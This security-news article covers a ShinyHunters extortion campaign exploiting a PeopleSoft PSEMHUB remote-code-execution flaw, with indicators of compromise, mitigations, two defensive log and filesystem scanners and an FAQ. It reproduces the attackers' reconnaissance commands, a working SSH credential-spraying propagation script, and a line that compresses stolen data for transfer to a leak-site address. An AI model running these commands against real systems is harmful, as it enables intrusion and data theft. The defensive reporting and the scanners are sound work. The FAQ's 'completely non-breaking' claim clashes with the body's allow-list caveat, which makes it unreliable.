An advanced cyber extortion campaign has been actively targeting the global higher education sector. Attributed to the threat group UNC6240 (popularly known as ShinyHunters), the campaign exploits a critical remote code execution (RCE) vulnerability within Oracle PeopleSoft infrastructure.
Identified as CVE-2026-35273, this flaw carries a CVSS score of 9.8 and resides in the application’s Environment Management Hub (PSEMHUB) component.
Joint tracking by Mandiant and the Google Threat Intelligence Group (GTIG) revealed active scanning and exploitation between May 27, 2026, and June 9, 2026.
Because this activity preceded Oracle’s official security advisory on June 10, 2026, the threat actors successfully leveraged the flaw as a zero-day vulnerability.
Threat intelligence indicates that over 100 global organizations were exposed, with 68% of the targeted endpoints operating within the higher education sector, primarily located in the United States.
The campaign specifically targets Environment Management Hub (PSEMHUB) endpoints. By exploiting CVE-2026-35273, the threat actors bypass authentication mechanisms to execute arbitrary code on the underlying web-tier filesystem.
During early June 2026, open attacker directories on staging servers were uncovered, exposing the operational blueprints of UNC6240.
The staging environments hosted specialized command-and-control (C2) agents and automation tools designed to sustain access, pivot deep into internal networks, and orchestrate massive data exfiltration.
[Attacker Internet]
│
▼ (CVE-2026-35273 RCE Exploit)
[PeopleSoft PSEMHUB Endpoint]
│
▼ (Drops Custom Shell/Scripts)
[/tmp/[victim_abbreviation]_fanout.sh]
│
├──► SSH Credential Spraying ──► [Internal Subnet Nodes]
└──► Drops Defacement File ──► [README-IF-YOU-SEE-THIS...]
The threat actors managed five sequential IP addresses (142.11.200.186 through 142.11.200.190) running Python-based SimpleHTTP servers on port 8888.
These exposed directories contained compiled payloads, scripts, and an identical .bash_history file that provided a definitive chronological timeline of the threat group’s operations:
- Infrastructure Establishment (May 27, 2026): The attackers deployed MeshCentral (v1.1.59), an open-source remote management server, alongside the acme-client npm package to dynamically provision Let’s Encrypt SSL certificates for their masquerading domain: azurenetfiles.net.
- Binary Masquerading: To evade endpoint detection and response (EDR) agents, the attackers staged pre-configured Windows MeshCentral binaries named meshagent32-azure-ops.exe and meshagent64-azure-ops.exe. These binaries masqueraded as legitimate Microsoft Azure NetApp Files endpoints, hardcoded to call back to wss://azurenetfiles.net:443/agent.ashx. An unconfigured Linux agent was also utilized, receiving execution parameters dynamically via the command line.
Once initial access to a PeopleSoft server was established, UNC6240 used the MeshCentral command-line utility (meshctrl.js) to conduct internal reconnaissance, running targeted queries to map the network topology:
```bash
# Auditing network configurations and active mounts
mount | grep -E "psoft|ps_config|nfs"
# Extracting internal subnet hosts and machine names from the Process Scheduler config
grep -hE '^[[:space:]]*Address=|^[[:space:]]*HostName=' /u01/app/psoft/ps_config_homes/csprd/appserv/prcs/psappsrv.cfg 2>/dev/null | head -80
```
Following reconnaissance, the attackers wrote a customized lateral propagation and defacement shell script, named [victim_abbreviation]_fanout.sh, via a heredoc directly into the /tmp directory.
The shell script targets internal PeopleSoft nodes by parsing local network configurations. It loops through a hardcoded array of administrative usernames and passwords to execute automated credential spraying via sshpass.
If successful, it drops an extortion marker file named README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT into critical WebLogic and Process Scheduler directories.
Below is the technical layout of the propagation script (credentials and the victim host pattern are redacted as on the original):
```bash
set +e
SRC="/u01/app/psoft/ps_config_homes/csprd/webserv/CSPRD02/README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
NAME="README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
BASE="/u01/app/psoft/ps_config_homes/csprd"
export PATH=/usr/bin:/bin

# Isolate internal PeopleSoft nodes from the local hosts file
HOSTS=$(grep -E '[redacted_victim_host_pattern]|csprd[0-9]' /etc/hosts | awk '{print $2}' | grep -v '^#' | sort -u)
PWDS="[redacted_passwords]"
USERS="[redacted_usernames]"

for h in $HOSTS; do
  copied=0
  for u in $USERS; do
    for p in $PWDS; do
      # Credential spray: one non-interactive SSH login attempt per user/password pair
      sshpass -p "$p" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 $u@$h "hostname" >/dev/null 2>&1 && {
        # On success, push the marker file into the WebLogic and Process Scheduler directories
        for dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; do
          sshpass -p "$p" ssh -o StrictHostKeyChecking=no $u@$h "test -d $dest && mkdir -p $dest && cat > $dest/$NAME" < "$SRC" 2>/dev/null && copied=1
        done
        break 2   # stop spraying this host once a credential works
      }
    done
  done
done
```
Following propagation, stolen directories were compressed using the zstd utility (zstd -3 -T0 -o exfil.tar.zst) and exfiltrated to 176.120.22.24, the public mirror hosting the ShinyHunters Data Leak Site (DLS). On June 9, 2026, multiple compromised academic institutions officially appeared on the threat group’s leak site.
Mitigation
Organizations operating Oracle PeopleSoft applications must execute immediate defensive actions to mitigate exposure to CVE-2026-35273.
- Multi-Server Configurations: Immediately disable the Environment Management Hub (EMHub) service following Oracle’s official security alert documentation.
- Single-Server Configurations: Completely remove the PSEMHUB application from the environment.
- Network Perimeter Blocking: If the service cannot be instantly disabled, apply strict firewall or load-balancer policies to block external access to /PSEMHUB/* (specifically /PSEMHUB/hub) and /PSIGW/HttpListeningConnector. These administrative, system-to-system services are non-breaking for standard end-user browser sessions; third-party systems that post to the Integration Gateway, however, must be allow-listed explicitly before the block is applied.
- WebLogic Access Logs: Scan for unauthorized HTTP POST requests targeting /PSEMHUB/hub and /PSIGW/HttpListeningConnector originating from unknown, external IP addresses.
- Server-Side Request Forgery (SSRF) Detection: Audit the HttpListeningConnector parameters for loops or loopback strings (127.0.0.1, localhost, ::1) within incoming headers, which indicate attempts to bypass web application firewall constraints.
- Outbound Traffic Anomalies: Monitor firewall netflow records for unauthorized outbound SMB traffic (TCP port 445) leaving PeopleSoft application hosts. The exploit chain attempts to force outbound connections to harvest Windows machine-account NetNTLM hashes.
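The access-log and SSRF checks in the list above can be scripted. The following Python is an added example written for this page, not code from the article or from Oracle: it parses WebLogic's common-format access log (that layout is an assumption; adjust the regex for extended formats), flags POST requests to the PSEMHUB and PSIGW paths from sources outside assumed internal ranges, and flags loopback strings in the HttpListeningConnector query string. The sample log lines, the internal ranges and the `To=` parameter in the sample are constructed. Loopback values carried in request headers need a log source that records headers, which the plain access log does not.

```python
"""Flag the WebLogic access-log patterns listed in the mitigation bullets:
external POSTs to the PSEMHUB/PSIGW administrative paths, and loopback
targets passed to HttpListeningConnector. Added example, not from the page;
the log lines are constructed and the internal ranges are assumptions."""
from __future__ import annotations

import ipaddress
import re
from urllib.parse import unquote

# WebLogic "common" access-log layout (assumed):
#   <client-ip> - - [<timestamp>] "<method> <uri> <protocol>" <status> <bytes>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# System-to-system paths that should never be reached from the internet.
ADMIN_PREFIXES = ("/PSEMHUB/", "/PSIGW/HttpListeningConnector")
CONNECTOR = "/PSIGW/HttpListeningConnector"
# Loopback spellings the page lists as SSRF / WAF-bypass indicators.
LOOPBACK_RE = re.compile(r"127\.0\.0\.1|localhost|::1", re.IGNORECASE)
# Assumed trusted source ranges; replace with the site's own allow-list.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # unparsable source: treat as untrusted
    return addr.is_loopback or any(addr in net for net in INTERNAL_NETS)


def classify(line: str) -> list[str]:
    """Return the indicator names one access-log line triggers (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    uri = unquote(m["uri"])  # decode %xx so percent-encoded loopback spellings still match
    path = uri.split("?", 1)[0]
    hits: list[str] = []
    if m["method"] == "POST" and path.startswith(ADMIN_PREFIXES) and not is_internal(m["ip"]):
        hits.append("external-POST-to-admin-endpoint")
    if path.startswith(CONNECTOR) and LOOPBACK_RE.search(uri):
        hits.append("loopback-in-connector-params")
    return hits


def scan(log_text: str) -> list[dict]:
    """Run classify() over every line and keep only the lines that matched."""
    results = []
    for line in log_text.splitlines():
        hits = classify(line)
        if hits:
            m = LOG_RE.match(line)
            results.append({"ip": m["ip"], "uri": m["uri"], "indicators": hits})
    return results


# Constructed sample: two public sources (TEST-NET ranges) and one internal host.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jun/2026:03:14:07 +0000] "POST /PSEMHUB/hub HTTP/1.1" 200 512
10.20.30.40 - - [02/Jun/2026:03:15:00 +0000] "POST /PSEMHUB/hub HTTP/1.1" 200 512
198.51.100.9 - - [02/Jun/2026:03:16:22 +0000] "GET /PSIGW/HttpListeningConnector?To=http://127.0.0.1:8000/PSEMHUB/hub HTTP/1.1" 200 88
198.51.100.9 - - [02/Jun/2026:03:17:01 +0000] "POST /PSIGW/HttpListeningConnector HTTP/1.1" 500 0
203.0.113.7 - - [02/Jun/2026:03:18:45 +0000] "GET /psp/ps/EMPLOYEE/HRMS/h/?tab=DEFAULT HTTP/1.1" 200 3120
"""

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ip"], r["uri"], ", ".join(r["indicators"]))
```

Run it against a real log with `scan(open(path).read())`; the internal POST from 10.20.30.40 is deliberately left unflagged, since the page's concern is external callers, while a GET carrying a loopback target is still reported even though it is not a POST.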
Regularly verify filesystem integrity across the web tier using the following matrix:
| Targeted Directory / Path | Indicator Object | Technical Context |
|---|---|---|
| <PS_CFG_HOME>/webserv/<domain>/applications/peoplesoft/PSEMHUB.war/ | Unauthorized .jsp files | Webshell persistence mechanisms dropped via the RCE exploit |
| .../PSEMHUB.war/envmetadata/transactions/ | Unexpected folders or binary drops | Staging area for malicious actor payloads and tools |
| .../PSEMHUB.war/ | Folders named logs, persistantstorage, or scratchpad | Non-standard directories created during exploitation phases |
| <docroot>/envmetadata/data/environment/ | Modified or recent .xml files | Exploitation of XMLDecoder to force unauthorized code execution upon system reboot |
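The matrix can be turned into a scheduled sweep. The Python below is an added example, not code from the page or from Oracle: it walks every PSEMHUB.war under <PS_CFG_HOME>/webserv/*/applications/peoplesoft/, applies the four checks from the table, and additionally looks for the fanout script's README marker, which the table does not list. It assumes a baseline set of expected .jsp names (empty by default, so every JSP is reported), a 14-day window for "recent" XML, and ELF/MZ magic bytes as the definition of a binary drop; the tree it builds in a temporary directory is constructed for demonstration.

```python
"""Filesystem-integrity sweep for the PeopleSoft web tier, covering the
indicator matrix above plus the fanout script's extortion marker.
Added example (not from the page); the demo tree it builds is constructed."""
from __future__ import annotations

import os
import tempfile
import time
from pathlib import Path

# Non-standard top-level directories the matrix lists under PSEMHUB.war/.
SUSPECT_DIRS = {"logs", "persistantstorage", "scratchpad"}
# Marker file written by the attacker's *_fanout.sh.
MARKER = "README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
# Magic bytes for native executables (ELF, Windows PE/MZ) dropped as payloads (assumption).
BINARY_MAGIC = (b"\x7fELF", b"MZ")


def looks_binary(path: Path) -> bool:
    with path.open("rb") as fh:
        head = fh.read(4)
    return any(head.startswith(m) for m in BINARY_MAGIC)


def scan_web_tier(ps_cfg_home: str | os.PathLike, docroot: str | os.PathLike,
                  known_jsp: frozenset[str] = frozenset(), recent_seconds: int = 14 * 86400,
                  now: float | None = None) -> list[tuple[str, str]]:
    """Return sorted (indicator, path) pairs for every finding.

    known_jsp: basenames of .jsp files present in a clean-install baseline
    (assumption: the operator keeps one; anything not in it is flagged).
    recent_seconds: how new a modified envmetadata XML must be to be reported.
    """
    now = time.time() if now is None else now
    cfg = Path(ps_cfg_home)
    findings: list[tuple[str, str]] = []

    for war in cfg.glob("webserv/*/applications/peoplesoft/PSEMHUB.war"):
        # 1) .jsp files not in the baseline: webshell persistence.
        for p in war.rglob("*.jsp"):
            if p.name not in known_jsp:
                findings.append(("unauthorized-jsp", str(p)))
        # 2) logs/, persistantstorage/, scratchpad/ directly under the war.
        for child in war.iterdir():
            if child.is_dir() and child.name.lower() in SUSPECT_DIRS:
                findings.append(("nonstandard-dir", str(child)))
        # 3) folders or native binaries inside envmetadata/transactions/.
        tx = war / "envmetadata" / "transactions"
        if tx.is_dir():
            for child in tx.iterdir():
                if child.is_dir() or (child.is_file() and looks_binary(child)):
                    findings.append(("transactions-drop", str(child)))

    # 4) recently modified XML under <docroot>/envmetadata/data/environment/
    #    (XMLDecoder payloads that run at restart).
    env = Path(docroot) / "envmetadata" / "data" / "environment"
    if env.is_dir():
        for p in env.rglob("*.xml"):
            if now - p.stat().st_mtime < recent_seconds:
                findings.append(("recent-env-xml", str(p)))

    # 5) the extortion marker, anywhere under PS_CFG_HOME (not in the matrix).
    for p in cfg.rglob(MARKER):
        if p.is_file():
            findings.append(("extortion-marker", str(p)))

    return sorted(findings)


def build_demo_tree(root: Path) -> tuple[Path, Path]:
    """Create a constructed, compromised-looking tree for demonstration."""
    cfg = root / "ps_config_homes" / "csprd"
    war = cfg / "webserv" / "peoplesoft" / "applications" / "peoplesoft" / "PSEMHUB.war"
    tx = war / "envmetadata" / "transactions"
    env = root / "docroot" / "envmetadata" / "data" / "environment"
    for d in (tx, war / "scratchpad", env, cfg / "webserv" / "CSPRD02"):
        d.mkdir(parents=True, exist_ok=True)
    (war / "cmd.jsp").write_text("<% Runtime.getRuntime(); %>")  # fake webshell
    (tx / "agent").write_bytes(b"\x7fELF" + b"\0" * 12)          # fake ELF drop
    (tx / "txn-0001.xml").write_text("<transaction/>")            # benign, not flagged
    (env / "env.xml").write_text("<java/>")                       # fresh mtime
    (cfg / "webserv" / "CSPRD02" / MARKER).write_text("you've been hacked")
    return cfg, root / "docroot"


def run_demo() -> list[tuple[str, str]]:
    with tempfile.TemporaryDirectory() as tmp:
        cfg, docroot = build_demo_tree(Path(tmp))
        return scan_web_tier(cfg, docroot)


if __name__ == "__main__":
    for indicator, path in run_demo():
        print(f"{indicator:20} {path}")
```

In production, call `scan_web_tier("/u01/app/psoft/ps_config_homes/csprd", docroot, known_jsp=baseline)` from cron and alert on any non-empty result; the baseline should be captured from a freshly patched install, not from the host being checked.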
Indicators of Compromise
- Staging IPs: 142.11.200.186, 142.11.200.187, 142.11.200.188, 142.11.200.189, 142.11.200.190
- Exfiltration Infrastructure Mirror: 176.120.22.24
- C2 Domain: azurenetfiles.net
- File Hashes (SHA-256):
  - .bash_history: 2ab684d93c1553fad87041b4dea97188a97e78589deee2a7bacff905564f3a35
  - meshagent64-azure-ops.exe: f02a924c9ff92a8780ce812511341182c6b509d45bc59f3f7b522e37225d24fc
  - meshagent32-azure-ops.exe: c7e9332731b06644fc73e0046a2a89eaa59b09f54250e9bd622467187351711f
Applying the latest patches from the Oracle Critical Patch Update advisory remains the most effective long-term defense against this cyber extortion campaign.
FAQ
Q1: What is the primary vulnerability exploited by ShinyHunters in this campaign?
A1: The threat group exploits CVE-2026-35273, a critical remote code execution flaw (CVSS 9.8) within Oracle PeopleSoft’s Environment Management Hub component.
Q2: Why was higher education targeted significantly more than other sectors?
A2: Higher education environments widely deploy Oracle PeopleSoft infrastructure and frequently feature expansive networks with exposed public-facing administrative endpoints.
Q3: Will blocking external network access to /PSEMHUB/ disrupt normal end-user portal operations?
A3: No, restricting this endpoint is completely non-breaking because it serves administrative, system-to-system communications and is separate from core student or employee portal experiences.
Q4: How does the threat actor’s custom fanout script spread across internal networks?
A4: The script parses the local hosts file for internal nodes and conducts automated SSH credential-spraying using a hardcoded list of administrative credentials.
Site: thecybrdef.com